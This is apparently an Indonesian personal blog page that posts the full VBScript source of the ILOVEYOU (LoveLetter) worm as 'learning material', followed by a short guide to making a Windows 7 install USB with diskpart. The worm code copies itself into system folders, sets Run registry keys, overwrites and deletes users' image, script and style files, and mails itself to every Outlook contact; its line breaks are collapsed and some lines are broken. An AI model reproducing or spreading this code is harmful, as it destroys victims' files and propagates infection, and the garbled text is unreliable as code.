Senin, 29 September 2014

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Almat untu belajar HTML untuk Pemula...!!!!!

Source code Virus I Lop You....Jangan Coba coba ya hati hati kena nih bahan pembelajaran gue...coz mau Q edit

rem barok -loveletter(vbe)
rem by: spyder / / @GRAMMERSoft Group /
On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow eq="" ctr=0 Set fso = CreateObject("Scripting.FileSystemObject") set file = fso.OpenTextFile(WScript.ScriptFullname,1) vbscopy=file.ReadAll main() sub main() On Error Resume Next dim wscr,rr set wscr=CreateObject("WScript.Shell") rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout") if (rr>=1) then wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD" end if Set dirwin = fso.GetSpecialFolder(0) Set dirsystem = fso.GetSpecialFolder(1) Set dirtemp = fso.GetSpecialFolder(2) Set c = fso.GetFile(WScript.ScriptFullName) c.Copy(dirsystem&"\MSKernel32.vbs") c.Copy(dirwin&"\Win32DLL.vbs") c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs") regruns() html() spreadtoemail() listadriv() end sub sub regruns() On Error Resume Next Dim num,downread regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32 ",dirsystem&"\MSKernel32.vbs" regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Wi n32DLL",dirwin&"\Win32DLL.vbs" downread="" downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download Directory") if (downread="") then downread="c:\" end if if (fileexist(dirsystem&"\WinFAT32.exe")=1) then Randomize num = Int((4 * Rnd) + 1) if num = 1 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page"," w6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe" elseif num = 2 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page"," 546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe" elseif num = 3 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page"," POhfgER67b3Vbvg/WIN-BUGSFIX.exe" elseif num = 4 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page"," YUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX .exe" end if end if if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFI X",downread&"\WIN-BUGSFIX.exe" regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","about:blank" end if end sub sub listadriv On Error Resume Next Dim d,dc,s Set dc = fso.Drives For Each d in dc If d.DriveType = 2 or d.DriveType=3 Then folderlist(d.path&"\") end if Next listadriv = s end sub sub infectfiles(folderspec) On Error Resume Next dim f,f1,fc,ext,ap,mircfname,s,bname,mp3 set f = fso.GetFolder(folderspec) set fc = f.Files for each f1 in fc ext=fso.GetExtensionName(f1.path) ext=lcase(ext) s=lcase( if (ext="vbs") or (ext="vbe") then set ap=fso.OpenTextFile(f1.path,2,true) ap.write vbscopy ap.close elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then set ap=fso.OpenTextFile(f1.path,2,true) ap.write vbscopy ap.close bname=fso.GetBaseName(f1.path) set cop=fso.GetFile(f1.path) cop.copy(folderspec&"\"&bname&".vbs") fso.DeleteFile(f1.path) elseif(ext="jpg") or (ext="jpeg") then set ap=fso.OpenTextFile(f1.path,2,true) ap.write vbscopy ap.close set cop=fso.GetFile(f1.path) cop.copy(f1.path&".vbs") fso.DeleteFile(f1.path) elseif(ext="mp3") or (ext="mp2") then set mp3=fso.CreateTextFile(f1.path&".vbs") mp3.write vbscopy mp3.close set att=fso.GetFile(f1.path) att.attributes=att.attributes+2 end if if (eq<>folderspec) then if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") then set scriptini=fso.CreateTextFile(folderspec&"\script.ini") scriptini.WriteLine "[script]" scriptini.WriteLine ";mIRC Script" scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt, if mIRC will" scriptini.WriteLine " corrupt... WINDOWS will affect and will not run correctly. thanks" scriptini.WriteLine ";" scriptini.WriteLine ";Khaled Mardam-Bey" scriptini.WriteLine ";" scriptini.WriteLine ";" scriptini.WriteLine "n0=on 1:JOIN:#:{" scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }" scriptini.WriteLine "n2= /.dcc send $nick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM" scriptini.WriteLine "n3=}" scriptini.close eq=folderspec end if end if next end sub sub folderlist(folderspec) On Error Resume Next dim f,f1,sf set f = fso.GetFolder(folderspec) set sf = f.SubFolders for each f1 in sf infectfiles(f1.path) folderlist(f1.path) next end sub sub regcreate(regkey,regvalue) Set regedit = CreateObject("WScript.Shell") regedit.RegWrite regkey,regvalue end sub function regget(value) Set regedit = CreateObject("WScript.Shell") regget=regedit.RegRead(value) end function function fileexist(filespec) On Error Resume Next dim msg if (fso.FileExists(filespec)) Then msg = 0 else msg = 1 end if fileexist = msg end function function folderexist(folderspec) On Error Resume Next dim msg if (fso.GetFolderExists(folderspec)) then msg = 0 else msg = 1 end if fileexist = msg end function sub spreadtoemail() On Error Resume Next dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad set regedit=CreateObject("WScript.Shell") set out=WScript.CreateObject("Outlook.Application") set mapi=out.GetNameSpace("MAPI") for ctrlists=1 to mapi.AddressLists.Count set a=mapi.AddressLists(ctrlists) x=1 regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a) if (regv="") then regv=1 end if if (int(a.AddressEntries.Count)>int(regv)) then for ctrentries=1 to a.AddressEntries.Count malead=a.AddressEntries(x) regad="" regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead) if (regad="") then set male=out.CreateItem(0) male.Recipients.Add(malead) male.Subject = "ILOVEYOU" male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me." male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs") male.Send regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD" end if x=x+1 next regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count else regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count end if next Set out=Nothing Set mapi=Nothing end sub sub html On Error Resume Next dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6 dta1="<HTML><HEAD><TITLE>LOVELETTER - HTML<?-?TITLE><META NAME=@-@Generator@-@ CONTENT=@-@BAROK VBS - LOVELETTER@-@>"&vbcrlf& _ "<META NAME=@-@Author@-@ CONTENT=@-@spyder ?-? ?-? @GRAMMERSoft Group ?-? Manila, Philippines ?-? March 2000@-@>"&vbcrlf& _ "<META NAME=@-@Description@-@ CONTENT=@-@simple but i think this is good...@-@>"&vbcrlf& _ "<?-?HEAD><BODY; -#,#-#main#-#)@-@ "&vbcrlf& _ "; -#,#-#main#-#)@-@ BGPROPERTIES=@-@fixed@-@ BGCOLOR=@-@#FF9933@-@>"&vbcrlf& _ "<CENTER>
<p>This HTML file need ActiveX Control<?-?p></p><p>To Enable to read this HTML file- Please press #-#YES#-# button to Enable ActiveX<?-?p>"&vbcrlf& _ "<?-?CENTER><MARQUEE LOOP=@-@infinite@-@ BGCOLOR=@-@yellow@-@>----------z--------------------z----------<?-?MARQUEE> "&vbcrlf& _ "<?-?BODY><?-?HTML>"&vbcrlf& _ "<SCRIPT language=@-@JScript@-@>"&vbcrlf& _ "<!--?-??-?"&vbcrlf& _ "if (window.screen){var wi=screen.availWidth;var hi=screen.availHeight;window.moveTo(0,0);window.resizeTo(wi,hi);}"&vbcrlf& _ "?-??-?-->"&vbcrlf& _ "<?-?SCRIPT>"&vbcrlf& _ "<SCRIPT LANGUAGE=@-@VBScript@-@>"&vbcrlf& _ "<!--"&vbcrlf& _ "on error resume next"&vbcrlf& _ "dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit"&vbcrlf& _ "aw=1"&vbcrlf& _ "code=" dta2="set fso=CreateObject(@-@Scripting.FileSystemObject@-@)"&vbcrlf& _ "set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf& _ "code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))"&vbcrlf& _ "code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34))"&vbcrlf& _ "code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92))"&vbcrlf& _ "set wri=fso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@)"&vbcrlf& _ "wri.write code4"&vbcrlf& _ "wri.close"&vbcrlf& _ "if (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@)) then"&vbcrlf& _ "if (err.number=424) then"&vbcrlf& _ "aw=0"&vbcrlf& _ "end if"&vbcrlf& _ "if (aw=1) then"&vbcrlf& _ "document.write @-@ERROR: can#-#t initialize ActiveX@-@"&vbcrlf& _ "window.close"&vbcrlf& _ "end if"&vbcrlf& _ "end if"&vbcrlf& _ "Set regedit = CreateObject(@-@WScript.Shell@-@)"&vbcrlf& _ "regedit.RegWrite @-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^-^Ru n^-^MSKernel32@-@,dirsystem&@-@^-^MSKernel32.vbs@-@"&vbcrlf& _ "?-??-?-->"&vbcrlf& _ "<?-?SCRIPT>" dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'") dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""") dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/") dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\") dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'") dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""") dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/") dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\") set fso=CreateObject("Scripting.FileSystemObject") set c=fso.OpenTextFile(WScript.ScriptFullName,1) lines=Split(c.ReadAll,vbcrlf) l1=ubound(lines) for n=0 to ubound(lines) lines(n)=replace(lines(n),"'",chr(91)+chr(45)+chr(91)) lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93)) lines(n)=replace(lines(n),"\",chr(37)+chr(45)+chr(37)) if (l1=n) then lines(n)=chr(34)+lines(n)+chr(34) else lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _" end if next set b=fso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM") b.close set d=fso.OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM",2) d.write dt5 d.write join(lines,vbcrlf) d.write vbcrlf d.write dt6 d.close end sub</p>

Cara Instal Win7 Menggunakan USB

Sebelum Menginstal menggunakan USB,maka perlu persiapan SBB....

1. 1buah Flashdisk dengan kapasitan 4Gb Untuk Windows 7 atau setidaknya mengambil tempat sebesar 3Gb.

2. File Win 7 yg sudah di burn menjadi File ISO...

Kemudian ikuti petunjuk di bawah...

Cara Manual:
  1. Colokkan USB Flaskdisk anda. (masukin ke usb port yah, jgn ke tempat lain).
  2. Tekan Tombol WIN+R, ketik cmd dan klik OK.
  3. Ketik diskpart dan tekan ENTER.
  4. Ketik list disk, tekan ENTER dan pilihlah yang mana adalah USB flashdisk anda, hati2 jangan salah pilih nanti salah2 yg keformat adalah disk yang lain. jikalau anda punya hanya 1 harddisk makan USB flaskdisknya adalah disk1.
  5. Ketik select disk 1 dan tekan ENTER.
  6. Ketik clean dan tekan ENTER.
  7. Ketik create partition primary lalu tekan ENTER.
  8. Ketik select partition 1 dan tekan ENTER
  9. Ketik active dan tekan ENTER.
  10. Ketik format fs=fat32 dan tekan ENTER
  11. Ketik assign dan tekan ENTER
  12. Ketik exit dan tekan ENTER.
  13. Masukkan disk DVD windows 7  dan copy lah semua isi DVD tadi ke USB Flaskdisk anda.
  14. Booting komputer anda melalu USB Flashdisk, setting malalui bios komputer anda, pastikan boot nya melalui USB Flashdisk, apabila langkah2nya betul, maka proses instalasi windows seharusnya berjalan melalui USB Flashdisk.